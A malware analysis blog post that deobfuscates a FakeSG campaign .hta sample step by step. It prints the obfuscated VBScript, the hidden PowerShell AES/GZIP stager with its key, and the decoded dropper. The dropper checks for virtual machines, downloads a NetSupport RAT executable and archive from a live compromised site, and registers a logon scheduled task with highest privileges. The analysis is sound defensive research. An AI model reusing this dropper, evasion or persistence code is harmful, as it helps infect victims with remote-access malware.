Analyzing FakeSG Malware Campaign Sample (.hta, .ps1)

FakeSG is an ongoing malware campaign (as of 12 Sep 2023). The campaign aims to compromise websites (most commonly WordPress), which then imitate browser update pages - prompting the user to install and execute a malicious file.

1. Campaign

The FakeSG campaign is known for its heavy obfuscation and payload delivery tactics - opting to HTML Applications (.hta) files to ultimately deliver the NetSupport Manager RAT.

Sources - PCrisk, Malwarebytes.

In this blog entry, we will analyze a .hta instance from the campaign, pulled off MalwareBazaar

2. Obfuscation

Here’s a snippet of the embedded VBScript in the .hta document. The obfuscation consists of 3 main parts.

A brief explanation of VBScript syntax:

: separates the next command, like ; in most other languages.
= denotes variable assignment.
&H denotes a hexadecimal number. (&H10 equals decimal 16).
ChrW() converts decimal numbers into unicode characters.
& concatenates strings together.

<script language="vBsCrIPt">

a70=574 - &H1F8:a117=872 - &H2F3:a110=932 - &H336:a99=711 - &H264:a116=679 - &H233:a105=980 - &H36B:a111=255 - &H90:a110=582 - &H1D8:a32=390 - &H166:a66=684 - &H26A:a99=926 - &H33B:a100=642 - &H21E:a40=925 - &H375:a66=955 - &H379:a121=707 - &H24A:a86=809 - &H2D3:a97=1071 - &H3CE:a108=814 - &H2C2:a32=965 - &H3A5:a71=269 - &HC6:a68=183 - &H73:a66=258 - &HC0:a41=307 - &H10A:a13=994 - &H3D5:a10=241 - &HE7:a32=633 - &H259:a32=320 - &H120:a32=815 - &H30F:a32=265 - &HE9:a32=530 - &H1F2:a32=964 - &H3A4:a32=571 - &H21B:a32=932 - &H384:a32=614 - &H246:a32=320 - &H120:a32=605 - &H23D:a32=394 - &H16A:a32=334 - &H12E:a32=980 - &H3B4:a32=598 - &H236:a32=293 - &H105:a32=874 - &H34A:a32=452 - &H1A4:a32=764 - &H2DC:a68=669 - &H259:a105=755 - &H28A:a109=1095 - &H3DA:a32=840 - &H328:a120=335 - &HD7:a100=585 - &H1E5:a113=1018 - &H389:a13=492 - &H1DF:a10=683 - &H2A1:a32=758 - &H2D6:a32=619 - &H24B:a32=443 - &H19B:a32=620 - &H24C:a32=871 - &H347:a32=513 - &H1E1:a32=992 - &H3C0:a32=719 - &
...
...
res =  ChrW ( a70 ) & ChrW ( a117 ) & ChrW ( a110 ) & ChrW ( a99 ) & ChrW ( a116 ) & ChrW ( a105 ) & ChrW ( a111 ) & ChrW ( a110 ) & ChrW ( a32 ) & ChrW ( a66 ) & ChrW ( a99 ) & ChrW ( a100 ) & ChrW ( a40 ) & ChrW ( a66 ) & ChrW ( a121 ) & ChrW ( a86 ) & ChrW ( a97 ) & ChrW ( a108 ) & ChrW ( a32 ) & ChrW ( a71 ) & ChrW ( a68 ) & ChrW ( a66 ) & ChrW ( a41 ) & ChrW ( a13 ) & ChrW ( a10 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a68 ) & ChrW ( a105 ) & ChrW ( a109 ) & ChrW ( a32 ) & ChrW ( a120 ) & ChrW ( a100 ) & ChrW ( a113 ) & ChrW ( a13 ) & ChrW ( a10 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( a32 ) & ChrW ( 
...
...
Execute Eval("Eval(""Eval(""""Eval(""""""""Eval(""""""""""""""""Eval(""""""""""""""""""""""""""""""""Eval(""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""Eval(""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""Eval(""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""Eval(""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""Eval
...
...

Close
</script>

3. Deobfuscation

Being pretty unfamiliar with the VBScript language, I sourced for some material on how to get started with this sample.

Surprisingly, I found an step-by-step analysis report for a similar malware sample - likely from the same malware family/threat actor. The author wrote a Python script, making use of regex to extract and deobfuscate the strings.

However, I was quite sure there was an easier way - and there was.

3.1. Initial Deobfuscation

We notice a string being built on the res variable.

res =  ChrW ( a70 ) & ChrW ( a117 ) & ChrW ( a110 ) & ChrW ( a99 ) ...

To dynamically extract its contents, we add the line document.write(res) and run the malicious code. Then, we simply copy the value written into the HTA window.

res =  ChrW ( a70 ) & ChrW ( a117 ) & ChrW ( a110 ) & ChrW ( a99 ) ...
document.write(res)

Shown below is the value of res in plaintext. Long arrays and ShellExecute - pretty gnarly stuff.

Immediately, Function Bcd looks to be a decoder for the Array structures. It subtracts 608 from each element and converts it into an ASCII character.

Function Bcd(ByVal GDB) 
    Dim xdq 
    Dim nHV 
    nHV = 608 
    Dim kBR 
    kBR = wHR(GDB) 
    If kBR = 7000 + 1204 Then 
        For Each xdq In GDB 
            Dim TMN 
            TMN = TMN & Chr(xdq - nHV) 
        Next 
    End If 
    Bcd = TMN 
End Function 

Function qSN() 
    Dim GDB 
    Dim DQJ 
    GDB = Array(640,653,677,728,709,707,725,724,713,719,718,688,719,716,713,707,729,640,693,718,690,709,723,724,722,713,707,724,709,708,640,691,724,705,722,724,653,688,722,719,707,709,723,723,640,647,707,717,708,654,709,728,709,647,640,653,695,713,718,708,719,727,691,724,729,716,709,640,712,713,708,708,709,718,640,653,673,722,711,725,717,709,718,724,684,713,723,724,640,731,655,707,640,720,719,727,709,722,723,712,709,716,716,654,709,728,709,640,644,715,678,728,688,682,640,669,640,647,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,673,674,664,722,717,697,660,710,680,720,706,664,712,709,714,683,656,698,677,665,713,659,724,697,705,677,716,686,721,662,661,661,714,723,674,726,693,720,681,682,678,680,687,718,657,725,707,661,716,689,714,660,674,709,657,716,660,665,692,691,721,725,730,711,664,694,665,676,680,724,693,724,675,722,685,708,655,698,684,726,687,698,661,686,715,711,678,720,722,715,690,710,658,693,705,679,665,729,680,720,708,712,724,722,676,730,720,690,682,679,676,713,675,705,691,662,673,717,683,713,728,651,712,707,694,688,716,696,710,716,714,729,718,676,686,684,727,730,660,688,693,722,714,717,659,655,691,708,719,722,663,708,706,659,710,713,698,709,721,711,711,724,697,689,657,718,698,682,656,688,726,676,692,706,664,696,661,712,665,697,721,718,678,714,716,727,719,674,718,657,683,721,717,660,728,690,716,691,665,720,676,675,659,709,651,721,661,684,710,705,677,716,716,727,697,691,659,710,676,674,656,673,673,727,683,688,681,655,729,685,687,730,663,729,714,722,694,729,720,718,686,713,685,678,674,712,696,693,698,719,685,691,713,651,719,728,665,676,713,686,714,683,710,710,698,720,727,683,725,687,685,662,661,682,688,694,688,656,696,707,722,682,707,694,664,683,687,687,720,682,711,682,707,683,676,679,665,726,698,659,675,691,725,706,675,684,678,683,684,723,680,657,677,684,695,716,692,663,729,661,689,684,651,684,720,723,659,662,676,697,695,677,707,663,713,679,730,663,705,727,716,697,722,691,710,659,678,728,698,696,712,721,691,719,726,720,674,659,715,677,721,717,697,692,727,692,651,656,709,718,697,689,717,708,689,685,660,730,717,720,665,696,656,729,719,693,729,684,673,674,715,657,725,716,681,678,728,681,662,710,676,687,698,726,688,691,657,687,665,687,662,728,679,723,686,662,678,682,662,723,664,696,712,656,696,709,724,691,660,710,706,661,709,681,722,713,695,657,728,678,686,685,680,709,711,723,674,690,661,709,684,656,651,697,711,677,689,665,718,709,663,657,720,729,676,677,692,689,683,715,655,712,684,690,709,674,695,688,716,677,662,673,705,678,719,684,660,708,728,658,696,661,728,715,662,691,729,727,708,695,673,696,724,656,681,721,729,695,728,685,707,710,730,719,709,675,651,685,658,708,719,679,692,724,680,651,729,691,730,719,709,658,730,692,727,718,655,720,674,719,728,719,692,662,694,686,677,676,695,686,663,674,721,682,730,716,697,709,688,687,655,713,713,716,712,697,680,678,696,718,697,713,707,675,688,678,722,715,712,710,663,693,651,723,728,660,683,691,682,718,727,718,720,722,713,686,708,725,680,692,694,711,698,721,679,686,658,723,651,710,695,682,714,658,673,729,730,665,675,713,685,720,707,722,710,724,691,655,689,723,679,705,725,724,651,729,712,698,656,705,675,696,692,657,688,723,665,692,691,719,712,658,692,658,665,680,690,693,693,726,680,711,698,689,727,680,680,695,677,676,686,705,665,673,657,715,675,716,684,721,680,707,684,665,663,683,722,680,662,689,656,694,724,677,697,727,688,660,716,710,692,680,690,657,698,691,655,712,689,694,680,689,676,664,676,685,712,665,696,716,730,684,676,712,690,705,709,673,660,715,657,710,728,686,684,661,724,709,681,727,696,717,659,680,720,657,727,678,691,722,714,718,721,658,662,682,709,725,678,718,664,660,726,661,674,708,684,689,692,726,693,723,708,691,710,683,675,706,719,674,726,698,661,711,677,682,684,723,709,708,720,690,729,730,709,660,684,727,713,695,687,682,714,712,720,718,711,719,658,659,718,706,687,692,711,711,664,661,697,720,712,721,698,690,679,665,681,682,690,690,724,715,683,730,656,710,690,655,661,686,692,657,711,684,686,683,717,664,663,687,730,693,713,727,723,714,705,696,685,651,712,679,691,693,722,715,709,708,683,656,658,725,688,714,730,664,681,674,656,659,716,673,674,727,690,723,658,722,711,709,695,698,710,714,693,712,694,656,651,697,710,717,657,686,681,665,687,689,708,690,659,695,721,705,674,680,705,678,694,692,707,690,730,679,730,657,675,692,676,716,686,662,730,651,705,714,651,697,727,709,658,682,689,681,723,687,665,658,661,660,694,696,659,661,681,686,727,662,715,727,676,723,655,680,696,716,661,727,673,655,714,724,730,710,710,663,683,677,712,678,690,727,662,715,710,692,712,693,655,692,658,684,714,692,682,675,705,665,655,675,707,687,722,724,726,708,727,694,697,663,722,656,677,659,656,689,674,693,727,714,691,724,728,728,698,706,694,690,691,693,677,691,698,698,714,682,682,662,728,658,685,686,727,674,675,710,662,665,728,673,676,684,688,716,685,726,651,714,710,679,689,684,683,692,706,689,686,683,721,676,724,723,694,682,717,718,723,723,697,685,708,679,695,714,712,725,655,659,715,689,678,713,686,728,687,698,698,695,711,690,729,693,680,718,730,715,716,725,692,685,714,710,680,709,661,717,686,679,678,663,711,720,681,687,697,662,656,678,681,677,687,705,711,710,714,695,692,679,677,718,686,661,709,715,655,680,725,730,683,678,723,712,707,690,656,721,651,689,710,728,706,698,689,697,656,656,678,697,665,725,691,692,727,688,684,717,665,716,724,657,729,664,655,722,691,694,697,728,674,692,711,681,658,723,707,678,730,707,687,718,685,686,718,728,693,691,693,708,710,709,683,727,691,655,716,726,686,721,715,710,685,663,674,709,691,695,715,690,656,682,720,719,708,724,725,691,729,729,685,712,658,663,729,680,728,720,697,726,727,659,685,695,681,655,705,655,684,716,659,698,693,728,723,696,725,720,657,693,730,686,658,695,692,660,674,686,657,706,676,711,690,659,677,659,664,717,696,661,730,663,709,659,682,665,727,709,722,692,665,726,698,678,688,677,721,729,675,728,691,706,659,721,692,681,707,709,697,655,655,728,719,692,679,675,659,664,686,656,674,722,677,677,720,657,693,683,660,685,717,709,710,694,690,715,665,689,669,669,647,667,644,681,679,698,705,716,695,640,669,640,647,697,656,682,721,694,659,682,716,708,677,728,691,706,696,694,716,694,718,682,679,689,694,720,717,689,718,712,685,690,694,682,727,692,659,686,688,706,717,694,662,707,659,681,669,647,667,644,688,705,676,705,695,682,714,694,640,669,640,686,709,727,653,687,706,714,709,707,724,640,647,691,729,723,724,709,717,654,691,709,707,725,722,713,724,729,654,675,722,729,720,724,719,711,722,705,720,712,729,654,673,709,723,685,705,718,705,711,709,708,647,667,644,688,705,676,705,695,682,714,694,654,685,719,708,709,640,669,640,699,691,729,723,724,709,717,654,691,709,707,725,722,713,724,729,654,675,722,729,720,724,719,711,722,705,720,712,729,654,675,713,720,712,709,722,685,719,708,709,701,666,666,677,675,674,667,644,688,705,676,705,695,682,714,694,654,688,705,708,708,713,718,711,640,669,640,699,691,729,723,724,709,717,654,691,709,707,725,722,713,724,729,654,675,722,729,720,724,719,711,722,705,720,712,729,654,688,705,708,708,713,718,711,685,719,708,709,701,666,666,698,709,722,719,723,667,644,688,705,676,705,695,682,714,694,654,674,716,719,707,715,691,713,730,709,640,669,640,657,658,664,667,644,688,705,676,705,695,682,714,694,654,683,709,729,691,713,730,709,640,669,640,658,661,662,667,644,688,705,676,705,695,682,714,694,654,683,709,729,640,669,640,699,691,729,723,724,709,717,654,675,719,718,726,709,722,724,701,666,666,678,722,719,717,674,705,723,709,662,660,691,724,722,713,718,711,648,644,681,679,698,705,716,695,649,667,644,722,696,715,729,714,640,669,640,699,691,729,723,724,709,717,654,675,719,718,726,709,722,724,701,666,666,678,722,719,717,674,705,723,709,662,660,691,724,722,713,718,711,648,644,715,678,728,688,682,649,667,644,730,727,681,717,708,687,695,684,640,669,640,644,722,696,715,729,714,699,656,654,654,657,661,701,667,644,688,705,676,705,695,682,714,694,654,681,694,640,669,640,644,730,727,681,717,708,687,695,684,667,644,725,684,726,716,709,721,680,709,728,640,669,640,644,688,705,676,705,695,682,714,694,654,675,722,709,705,724,709,676,709,707,722,729,720,724,719,722,648,649,667,644,719,725,673,697,681,688,714,720,730,640,669,640,644,725,684,726,716,709,721,680,709,728,654,692,722,705,718,723,710,719,722,717,678,713,718,705,716,674,716,719,707,715,648,644,722,696,715,729,714,652,640,657,662,652,640,644,722,696,715,729,714,654,684,709,718,711,724,712,640,653,640,657,662,649,667,644,688,705,676,705,695,682,714,694,654,676,713,723,720,719,723,709,648,649,667,644,718,707,692,692,673,718,640,669,640,686,709,727,653,687,706,714,709,707,724,640,691,729,723,724,709,717,654,681,687,654,685,709,717,719,722,729,691,724,722,709,705,717,648,640,652,640,644,719,725,673,697,681,688,714,720,730,640,649,667,644,727,684,687,709,673,722,698,640,669,640,686,709,727,653,687,706,714,709,707,724,640,691,729,723,724,709,717,654,681,687,654,685,709,717,719,722,729,691,724,722,709,705,717,667,644,710,715,715,697,684,712,718,687,730,640,669,640,686,709,727,653,687,706,714,709,707,724,640,691,729,723,724,709,717,654,681,687,654,675,719,717,720,722,709,723,723,713,719,718,654,679,730,713,720,691,724,722,709,705,717,640,644,718,707,692,692,673,718,652,640,648,699,681,687,654,675,719,717,720,722,709,723,723,713,719,718,654,675,719,717,720,722,709,723,723,713,719,718,685,719,708,709,701,666,666,676,709,707,719,717,720,722,709,723,723,649,667,644,710,715,715,697,684,712,718,687,730,654,675,719,720,729,692,719,648,640,644,727,684,687,709,673,722,698,640,649,667,644,710,715,715,697,684,712,718,687,730,654,675,716,719,723,709,648,649,667,644,718,707,692,692,673,718,654,675,716,719,723,709,648,649,667,699,706,729,724,709,699,701,701,640,644,691,697,708,712,687,714,728,640,669,640,644,727,684,687,709,673,722,698,654,692,719,673,722,722,705,729,648,649,667,644,721,712,697,728,709,714,717,640,669,640,699,691,729,723,724,709,717,654,692,709,728,724,654,677,718,707,719,708,713,718,711,701,666,666,693,692,678,664,654,679,709,724,691,724,722,713,718,711,648,644,691,697,708,712,687,714,728,649,667,644,721,712,697,728,709,714,717,640,732,640,720,719,727,709,722,723,712,709,716,716,640,653,640,733) 
    Dim thI 
    DQJ = Array(720,719,727,709,722,723,712,709,716,716,654,709,728,709) 
    thI = Bcd(GDB) 
    Set Mdq = RSv(Bcd(Array(691,712,709,716,716,654,673,720,720,716,713,707,705,724,713,719,718))) 
    LJD = Bcd(DQJ) 
    Mdq.ShellExecute LJD, thI,"","runas",0 self.close() 
End Function 

Function wHR(ByVal kBR) 
    wHR = VarType(kBR) 
End Function 

Function RSv(ByVal objectType) 
    Set RSv = CreateObject(objectType) 
End Function 

qSN()

3.2. String Decoding

Performing the same deobfuscation technique as above, by printing the variable value with document.write(). I decoded the 3 Arrays observed in the document. Below is the result.

Here, we note a cmd.exe process is spawned running powershell. Along with powershell code to be executed. Let’s analyze it!

LJD = "powershell.exe"

Set Mdq = RSv("Shell.Application")

thI = "-ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $kFxPJ = 'AAAAAAAAAAAAAAAAAAAAAB8rmY4fHpb8hejK0ZE9i3tYaElNq655jsBvUpIJFHOn1uc5lQj4Be1l49TSquzg8V9DHtUtCrMd/ZLvOZ5NkgFprkRf2UaG9yHpdhtrDzpRJGDiCaS6AmKix+hcVPlXfljynDNLwz4PUrjm3/Sdor7db3fiZeqggtYQ1nZJ0PvDTb8X5h9YqnFjlwoBn1Kqm4xRlS9pDC3e+q5LfaEllwYS3fDB0AAwKPI/yMOz7yjrVypnNiMFBhXUZoMSi+ox9DiNjKffZpwKuOM65JPVP0XcrJcV8KOOpJgJcKDG9vZ3CSubCLFKLsH1ELWlT7y5QL+Lps36DYWEc7iGz7awlYrSf3FxZXhqSovpB3kEqmYTwT+0enYQmdQM4zmp9X0yoUyLABk1ulIFxI6fDOZvPS1O9O6xGsN6FJ6s8Xh0XetS4fb5eIriW1xFNMHegsBR5eL0+YgEQ9ne71pyDETQKk/hLReBWPlE6AaFoL4dx2X5xk6SywdWAXt0IqyWxMcfzoeC+M2doGTtH+ySzoe2zTwn/pBoxoT6VNEDWN7BqJzlYePO/iilhYHFXnYicCPFrkhf7U+sx4KSJnwnpriNduHTVgZqGN2s+fWJj2Ayz9CiMpcrftS/QsGaut+yhZ0aCXT1Ps9TSoh2T29HRUUvHgZQwHHWEDNa9A1kClLqHcL97KrH6Q0VtEYwP4lfTHR1ZS/hQVHQD8DMh9XlzLDhRaeA4k1fxNL5teIwXm3Hp1wFSrjnq26JeuFn84v5BdLQTvUsdSfKCboBvZ5gEJLsedpRyze4LwiWOJjhpngo23nbOTgg85YphqZRG9IJRRtkKz0fR/5NT1gLNKm87OzUiwsjaXM+hGSUrkedK02uPjz8IB03lABwRs2rgeWZfjUhV0+Yfm1NI9OQdR3WqaBHaFVTcRzGz1CTDlN6z+aj+Ywe2JQIsO9254VX35INw6kwDs/HXl5wA/jtzff7KEhFRw6kfThU/T2LjTJCa9/CcOrtvdwVY7r0E30QBUwjStxxZbVRSUESZZjJJ6x2MNwBCf69xADLPlMv+jfGQLKTbQNKqDtsVJmnssYMdGWjhu/3kQFiNxOZZWgRyUHnzkluTMjfHe5mNGF7gpIOY60FIEOagfjWTGEnN5ek/HuzKFshcR0q+QfxbZQY00FY9uSTwPLm9lt1y8/rSVYxBTgI2scFzcOnMNnxUSUdfeKwS/lvNqkfM7BeSWkR0JpodtuSyyMh27yHxpYvw3MWI/a/Ll3ZUxsXup1UzN2WT4BN1bDgR3E38mX5z7e3J9werT9vZFPEqyCxSb3qTIceY//xoTGC38N0BrEEp1UK4MmefVRk9Q==';$IGZalW = 'Y0JqV3JldExSbXVlVnJGQVpmQnhMRVJwT3NPbmV6c3I=';$PaDaWJjV = New-Object 'System.Security.Cryptography.AesManaged';$PaDaWJjV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaDaWJjV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaDaWJjV.BlockSize = 128;$PaDaWJjV.KeySize = 256;$PaDaWJjV.Key = [System.Convert]::FromBase64String($IGZalW);$rXkyj = [System.Convert]::FromBase64String($kFxPJ);$zwImdOWL = $rXkyj[0..15];$PaDaWJjV.IV = $zwImdOWL;$uLvleqHex = $PaDaWJjV.CreateDecryptor();$ouAYIPjpz = $uLvleqHex.TransformFinalBlock($rXkyj, 16, $rXkyj.Length - 16);$PaDaWJjV.Dispose();$ncTTAn = New-Object System.IO.MemoryStream( , $ouAYIPjpz );$wLOeArZ = New-Object System.IO.MemoryStream;$fkkYLhnOz = New-Object System.IO.Compression.GzipStream $ncTTAn, ([IO.Compression.CompressionMode]::Decompress);$fkkYLhnOz.CopyTo( $wLOeArZ );$fkkYLhnOz.Close();$ncTTAn.Close();[byte[]] $SYdhOjx = $wLOeArZ.ToArray();$qhYxejm = [System.Text.Encoding]::UTF8.GetString($SYdhOjx);$qhYxejm | powershell - }"

3.3. Powershell Analysis

Below is the manually decoded powershell code. The malware writers seem to have made a big fuss about obfuscating the payload. The payload goes through an AES decryption and GZIP decompression.

-ExecutionPolicy UnRestricted 
Start-Process 'cmd.exe' 
-WindowStyle hidden 
-ArgumentList {
    /c powershell.exe 
    $encrypted_payload_b64 = 'AAAAAAAAAAAAAAAAAAAAAB8rmY4fHpb8hejK0ZE9i3tYaElNq655jsBvUpIJFHOn1uc5lQj4Be1l49TSquzg8V9DHtUtCrMd/ZLvOZ5NkgFprkRf2UaG9yHpdhtrDzpRJGDiCaS6AmKix+hcVPlXfljynDNLwz4PUrjm3/Sdor7db3fiZeqggtYQ1nZJ0PvDTb8X5h9YqnFjlwoBn1Kqm4xRlS9pDC3e+q5LfaEllwYS3fDB0AAwKPI/yMOz7yjrVypnNiMFBhXUZoMSi+ox9DiNjKffZpwKuOM65JPVP0XcrJcV8KOOpJgJcKDG9vZ3CSubCLFKLsH1ELWlT7y5QL+Lps36DYWEc7iGz7awlYrSf3FxZXhqSovpB3kEqmYTwT+0enYQmdQM4zmp9X0yoUyLABk1ulIFxI6fDOZvPS1O9O6xGsN6FJ6s8Xh0XetS4fb5eIriW1xFNMHegsBR5eL0+YgEQ9ne71pyDETQKk/hLReBWPlE6AaFoL4dx2X5xk6SywdWAXt0IqyWxMcfzoeC+M2doGTtH+ySzoe2zTwn/pBoxoT6VNEDWN7BqJzlYePO/iilhYHFXnYicCPFrkhf7U+sx4KSJnwnpriNduHTVgZqGN2s+fWJj2Ayz9CiMpcrftS/QsGaut+yhZ0aCXT1Ps9TSoh2T29HRUUvHgZQwHHWEDNa9A1kClLqHcL97KrH6Q0VtEYwP4lfTHR1ZS/hQVHQD8DMh9XlzLDhRaeA4k1fxNL5teIwXm3Hp1wFSrjnq26JeuFn84v5BdLQTvUsdSfKCboBvZ5gEJLsedpRyze4LwiWOJjhpngo23nbOTgg85YphqZRG9IJRRtkKz0fR/5NT1gLNKm87OzUiwsjaXM+hGSUrkedK02uPjz8IB03lABwRs2rgeWZfjUhV0+Yfm1NI9OQdR3WqaBHaFVTcRzGz1CTDlN6z+aj+Ywe2JQIsO9254VX35INw6kwDs/HXl5wA/jtzff7KEhFRw6kfThU/T2LjTJCa9/CcOrtvdwVY7r0E30QBUwjStxxZbVRSUESZZjJJ6x2MNwBCf69xADLPlMv+jfGQLKTbQNKqDtsVJmnssYMdGWjhu/3kQFiNxOZZWgRyUHnzkluTMjfHe5mNGF7gpIOY60FIEOagfjWTGEnN5ek/HuzKFshcR0q+QfxbZQY00FY9uSTwPLm9lt1y8/rSVYxBTgI2scFzcOnMNnxUSUdfeKwS/lvNqkfM7BeSWkR0JpodtuSyyMh27yHxpYvw3MWI/a/Ll3ZUxsXup1UzN2WT4BN1bDgR3E38mX5z7e3J9werT9vZFPEqyCxSb3qTIceY//xoTGC38N0BrEEp1UK4MmefVRk9Q==';
    $aes_key = 'Y0JqV3JldExSbXVlVnJGQVpmQnhMRVJwT3NPbmV6c3I=';
    $encrypted_payload = [System.Convert]::FromBase64String($encrypted_payload_b64);
    $aes_iv = $encrypted_payload[0..15];

    $AesManaged = New-Object 'System.Security.Cryptography.AesManaged';
    $AesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB;
    $AesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;
    $AesManaged.BlockSize = 128;
    $AesManaged.KeySize = 256;
    $AesManaged.Key = [System.Convert]::FromBase64String($aes_key);
    $AesManaged.IV = $aes_iv;

    $AesDecryptor = $AesManaged.CreateDecryptor();
    $gzip_payload = $AesDecryptor.TransformFinalBlock($encrypted_payload, 16, $encrypted_payload.Length - 16);
    $AesManaged.Dispose();
    
    $gzip_memory = New-Object System.IO.MemoryStream( , $gzip_payload );
    $payload_memory = New-Object System.IO.MemoryStream;
    $gzipstream_obj = New-Object System.IO.Compression.GzipStream $gzip_memory, ([IO.Compression.CompressionMode]::Decompress);
    $gzipstream_obj.CopyTo( $payload_memory );
    $gzipstream_obj.Close();
    $gzip_memory.Close();
    
    [byte[]] $barr_utf8_payload = $payload_memory.ToArray();
    $payload_str = [System.Text.Encoding]::UTF8.GetString($barr_utf8_payload);
    $payload_str | powershell - 
}

In the above code, we note that $payload_str is executed by the powershell interpreter. To extract the contents of $payload_str, simply run the code in powershell and print $payload_str. Below is the result after manual tidying and renaming.

Here, we observe the heart of this sample - a dropper, with VM detection and persistence.

function func_writeToFile($filepath, $fileBytes) {
    [IO.File]::WriteAllBytes($filepath, $fileBytes)
};

function Mne($filepath) {
    if ($filepath.EndsWith('.zip') -eq $True) {
        $basename = '\' + (Get-Item $filepath).Basename; 
        $Script:basePath = Join-Path $appdataDir $basename;
        Expand-Archive -Path $filepath -DestinationPath $basePath; 
        $Script:decompressed = 1; 
        del $filepath
    } else { 
        if ($decompressed -eq 1) { 
            mv -Path $filepath -Destination $basePath; 
            $filepath = Join-Path $basePath CareAbout.exe
        };
        $Action = (New-ScheduledTaskAction -Execute $filepath);
        $Trigger = New-ScheduledTaskTrigger -AtLogOn;
        Register-ScheduledTask -TaskName "BackgroundCheck" -Action $Action -Trigger $Trigger -RunLevel "Highest" -Force;Start $filepath
    }
};
    
function func_downloadBytes($BCl) {
    $objWebClient = New-Object ("Net.WebClient");
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;
    $fileBytes = $objWebClient.DownloadData($BCl);
    return $fileBytes
};

function func_decode($rHG) {
    $pef=6735;
    $NMd=$Null;
    foreach($pPr in $rHG) {
        $NMd+=[char]($pPr-$pef)
    };
    return $NMd
};

function func_main(){
    $appdataDir = $env:AppData + '\';
    ;
    ;
    $vmStrings = @("VirtualBox", "VMware", "Xen", "Bochs","Qemu", "Hyper", "VRTUAL", "Virt", "A M I");
    $biosProperties = Get-WmiObject Win32_Bios | Select-Object -Property * | Out-String; 
    foreach($vmString in $vmStrings) {
        $vmStringFound = Select-String -Pattern $vmString -Input $biosProperties -AllMatches -Quiet;
        if($vmStringFound -eq $True) {
            Exit
        }
    };
    $pathDancingParty = $appdataDir + 'DancingParty.zip'; 
    if (Test-Path -Path $pathDancingParty) {
        Mne $pathDancingParty;
    } Else { 
        $bytesDancingParty = func_downloadBytes ("https://moodi-wood.com/wp-content/uploads/astra/DancingParty.zip");
        func_writeToFile $pathDancingParty $bytesDancingParty;
        Mne $pathDancingParty;
    }
    $pathCareAbout = $appdataDir + 'CareAbout.exe'; 
    if (Test-Path -Path $pathCareAbout) {
        Mne $pathCareAbout;
    } Else { 
        $bytesCareAbout = func_downloadBytes ("https://moodi-wood.com/wp-content/uploads/astra/CareAbout.exe");
        func_writeToFile $pathCareAbout $bytesCareAbout;
        Mne $pathCareAbout;
    };
;
}

func_main;

3.4. Persistence

Most notably, the malware drops 2 files - DancingParty.zip and CareAbout.exe - downloaded from the internet into the %appdata% folder.

Here’s the process in order,

DancingParty.zip is downloaded and decompressed.
CareAbout.exe is downloaded
Schedules CareAbout.exe to run at logon with Windows Task Scheduler.

function Mne($filepath) {
    if ($filepath.EndsWith('.zip') -eq $True) {
        $basename = '\' + (Get-Item $filepath).Basename; 
        $Script:basePath = Join-Path $appdataDir $basename;
        Expand-Archive -Path $filepath -DestinationPath $basePath; 
        $Script:decompressed = 1; 
        del $filepath
    } else { 
        if ($decompressed -eq 1) { 
            mv -Path $filepath -Destination $basePath; 
            $filepath = Join-Path $basePath CareAbout.exe
        };
        $Action = (New-ScheduledTaskAction -Execute $filepath);
        $Trigger = New-ScheduledTaskTrigger -AtLogOn;
        Register-ScheduledTask -TaskName "BackgroundCheck" -Action $Action -Trigger $Trigger -RunLevel "Highest" -Force;Start $filepath
    }
};

3.5. Anti-Analysis

The powershell process prematurely exits if detected within a virtualized environment. This check is performed by looking for the following strings in the host’s BIOS properties - VirtualBox, VMware, Xen, Bochs, Qemu, Hyper, VRTUAL, Virt, A M I.

$vmStrings = @("VirtualBox", "VMware", "Xen", "Bochs","Qemu", "Hyper", "VRTUAL", "Virt", "A M I");
$biosProperties = Get-WmiObject Win32_Bios | Select-Object -Property * | Out-String; 
foreach($vmString in $vmStrings) {
    $vmStringFound = Select-String -Pattern $vmString -Input $biosProperties -AllMatches -Quiet;
    if($vmStringFound -eq $True) {
        Exit
    }
};

4. Summary

This .hta malware sample is a highly obfuscated dropper written in VBScript. Execution of the malicious VBScript spawns a powershell process that drops 2 files - CareAbout.exe and DancingParty.zip.

Persistence is established through the Windows Task Scheduler. And basic anti-virtualization techniques are deployed.

When unzipped, DancingParty.zip contains another copy of CareAbout.exe. CareAbout.exe is a legitimate signed executable of NetSupport Manager RAT.

NetSupport Manager RAT is a remote-access tool, commonly abused for conducting malicious activity.

5. Further Analysis

Downloading the dropped files manually.

C:\Users\root\Desktop
